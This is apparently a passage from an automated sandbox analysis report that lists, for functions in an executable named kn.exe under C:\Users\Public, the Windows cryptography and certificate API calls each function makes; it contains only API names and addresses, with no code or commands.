Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF685486280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF685486280
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854D2278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,7_2_00007FF6854D2278
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854E8298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,7_2_00007FF6854E8298
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854DE274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF6854DE274
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF685450300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,7_2_00007FF685450300
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68551A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,7_2_00007FF68551A2E0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF685496194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF685496194
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68547417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF68547417C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854D61AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,7_2_00007FF6854D61AC
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854521A4 #360,#359,#357,#357,BCryptFreeBuffer,7_2_00007FF6854521A4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68551613C CryptDecodeObjectEx,7_2_00007FF68551613C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854AE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF6854AE1F8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854EA1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,7_2_00007FF6854EA1F8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF685516214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,7_2_00007FF685516214
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68549A1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,7_2_00007FF68549A1E8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854A8488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,7_2_00007FF6854A8488
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68548A450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,7_2_00007FF68548A450
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68548C450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,7_2_00007FF68548C450
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68543C514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,7_2_00007FF68543C514
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854DE516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF6854DE516
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854824D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,7_2_00007FF6854824D4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854244E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6854244E0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68543E3B0 #357,#357,CryptDecodeObject,LocalFree,7_2_00007FF68543E3B0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854A6374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,7_2_00007FF6854A6374
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A2358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,7_2_00007FF6854A2358
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685434410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF685434410
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E8404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF6854E8404
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854523E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,7_2_00007FF6854523E8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DEE94 CryptSignMessage,SetLastError,7_2_00007FF6854DEE94
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685450E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,7_2_00007FF685450E94
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685482E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF685482E7C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6EA8 NCryptImportKey,#360,7_2_00007FF6854E6EA8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6E48 NCryptSetProperty,#360,7_2_00007FF6854E6E48
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B2E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,7_2_00007FF6854B2E6C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F4E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,7_2_00007FF6854F4E58
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6F2C NCryptExportKey,#360,7_2_00007FF6854E6F2C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685448F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,7_2_00007FF685448F1C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0EF4 NCryptImportKey,#205,#359,#359,#357,7_2_00007FF6854B0EF4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685510ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,7_2_00007FF685510ED0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0D84 NCryptFreeObject,#205,#357,7_2_00007FF6854B0D84
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B2D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF6854B2D78
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6D78 NCryptOpenKey,#360,7_2_00007FF6854E6D78
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E2DAC #357,#357,CryptFindOIDInfo,LocalFree,7_2_00007FF6854E2DAC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685440E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF685440E24
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0DD4 NCryptGetProperty,#205,#359,#357,#359,#357,7_2_00007FF6854B0DD4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D8DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,7_2_00007FF6854D8DD0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685500DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,7_2_00007FF685500DB8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6DE0 NCryptCreatePersistedKey,#360,7_2_00007FF6854E6DE0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685494DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF685494DDC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68545107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,7_2_00007FF68545107C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854BB0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6854BB0A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547B098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,7_2_00007FF68547B098
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B1058 NCryptOpenStorageProvider,#205,#359,#357,7_2_00007FF6854B1058
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E705C BCryptGetProperty,#360,7_2_00007FF6854E705C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685469134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,7_2_00007FF685469134
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E7124 BCryptGenerateKeyPair,#360,7_2_00007FF6854E7124
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,7_2_00007FF6854D511C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E70C8 BCryptSetProperty,#360,7_2_00007FF6854E70C8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B10D8 NCryptSetProperty,#205,#359,#357,#359,#357,7_2_00007FF6854B10D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B30D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF6854B30D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685444F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,7_2_00007FF685444F90
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0FB4 NCryptOpenKey,#205,#359,#357,#357,7_2_00007FF6854B0FB4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6FAC BCryptOpenAlgorithmProvider,#360,7_2_00007FF6854E6FAC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685494F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF685494F50
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DEF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,7_2_00007FF6854DEF74
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,7_2_00007FF6854A0F58
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E700C BCryptEnumAlgorithms,#360,7_2_00007FF6854E700C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68542302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF68542302F
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A9028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,7_2_00007FF6854A9028
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685427034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,7_2_00007FF685427034
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B7020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6854B7020
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6854B301C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E2A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,7_2_00007FF6854E2A78
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685426A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,7_2_00007FF685426A84
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF68549EA7C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B8AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6854B8AA0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A8AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF6854A8AFC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685452B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,7_2_00007FF685452B00
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0ABC BCryptVerifySignature,#205,#357,#357,#357,#357,7_2_00007FF6854B0ABC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B2AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,7_2_00007FF6854B2AE4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E2994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,7_2_00007FF6854E2994
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B099C BCryptOpenAlgorithmProvider,#205,#359,#359,7_2_00007FF6854B099C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854729A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF6854729A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B8940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,7_2_00007FF6854B8940
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854BC940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,7_2_00007FF6854BC940
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543C960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF68543C960
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549AA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,7_2_00007FF68549AA00
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685494A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,7_2_00007FF685494A34
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0A18 BCryptSetProperty,#205,#359,#357,#357,7_2_00007FF6854B0A18
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B4A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,7_2_00007FF6854B4A1C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854EA9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF6854EA9F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547E9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,7_2_00007FF68547E9F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6C88 NCryptEnumAlgorithms,#360,7_2_00007FF6854E6C88
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B2C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,7_2_00007FF6854B2C80
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F4C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,7_2_00007FF6854F4C80
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854BACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,7_2_00007FF6854BACAC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A4CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6854A4CA0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685416C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,7_2_00007FF685416C4C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0C3C NCryptExportKey,#205,#359,#359,#357,7_2_00007FF6854B0C3C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E8C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF6854E8C58
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0D14 NCryptFinalizeKey,#205,#357,#357,7_2_00007FF6854B0D14
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A2CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,7_2_00007FF6854A2CF8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B2CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,7_2_00007FF6854B2CFC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6D2C NCryptFreeBuffer,#360,7_2_00007FF6854E6D2C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685472D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF685472D18
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685474CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,7_2_00007FF685474CC0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685508CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,7_2_00007FF685508CF4
